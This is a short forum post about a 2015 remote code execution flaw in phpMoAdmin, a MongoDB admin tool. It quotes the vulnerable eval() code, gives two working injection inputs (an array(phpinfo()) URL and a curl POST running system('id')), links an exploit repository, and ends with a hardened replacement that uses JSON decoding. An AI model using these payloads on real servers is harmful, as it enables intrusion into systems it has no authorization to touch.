View full version : MongoDB phpMoAdmin Zero-day


VY_CMa
04.03.2015, 15:50
RCE. News here (http://thehackernews.com/2015/03/phpMoAdmin-mongoDB-exploit.html).

Video: https://vimeo.com/121072742


PHP:
$find = array();

if (isset($_GET['find']) && $_GET['find']) {
    $_GET['find'] = trim($_GET['find']);
    if (strpos($_GET['find'], 'array') === 0) {
        // user-controlled GET parameter is evaluated as PHP source
        eval('$find = ' . $_GET['find'] . ';');
    } else if (is_string($_GET['find'])) {
        if ($findArr = json_decode($_GET['find'], true)) {
            $find = $findArr;
        }
    }
}



PHP:
http://localhost/moadmin.php?action=listRows&find=array(phpinfo())&collection=123

UP: another method was posted on seclists (http://seclists.org/fulldisclosure/2015/Mar/19)

Code:
curl "http://path.to/moadmin.php" -d "object=1;system('id');exit"



PHP:
Filename: moadmin.php

1. create new moadminComponent object

1977: $mo = new moadminComponent;

2. if the http-post parameter 'object' is set

738: class moadminComponent {
...
762: public function __construct() {
...
786:     if (isset($_POST['object'])) {
787:         if (self::$model->saveObject($_GET['collection'],
                                         $_POST['object'])) {
...

3. evaluate the value of 'object' as PHP code

692: public function saveObject($collection, $obj) {
693:     eval('$obj=' . $obj . ';'); // cast from string to array



Ready-made exploit: https://github.com/XiphosResearch/exploits/tree/master/phpMoAdmin
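A hardened form of the two eval() sites quoted in the post, added here as an illustration and not phpMoAdmin's own fix; the function names, the callable used to persist the document and the "JSON only" input contract are assumptions of this example:

```php
<?php
// Added illustration, not phpMoAdmin's code: both eval() sites from the post
// (the 'find' filter and saveObject()) replaced by strict JSON decoding.
// Function names and the JSON-only contract are assumptions for this example.

/**
 * Decode a user-supplied document. Returns null for anything that is not a
 * JSON object/array, so inputs such as "array(phpinfo())" or
 * "1;system('id');exit" are rejected as plain data, never executed.
 */
function decodeUserDocument(?string $raw): ?array
{
    if ($raw === null) {
        return null;
    }
    $raw = trim($raw);
    if ($raw === '') {
        return null;
    }
    // depth limit 64: deeply nested payloads fail decoding instead of
    // exhausting the parser
    $decoded = json_decode($raw, true, 64);
    if (json_last_error() !== JSON_ERROR_NONE || !is_array($decoded)) {
        return null;
    }
    return $decoded;
}

// 'find' filter: the eval() branch for the PHP 'array(...)' syntax is gone;
// a filter that is not valid JSON falls back to an empty query.
$find = decodeUserDocument($_GET['find'] ?? null) ?? [];

/**
 * saveObject() without eval(): the document is data, never PHP source.
 * $persist is an assumed callable (e.g. a wrapper around the driver's save)
 * that receives the already decoded array.
 */
function saveObjectSafely(callable $persist, string $collection, string $rawObject): bool
{
    $obj = decodeUserDocument($rawObject);
    if ($obj === null) {
        return false; // reject instead of eval('$obj=' . $obj . ';')
    }
    return (bool) $persist($collection, $obj);
}

if (isset($_POST['object'])) {
    $saved = saveObjectSafely($persist, $_GET['collection'] ?? '', $_POST['object']);
}
```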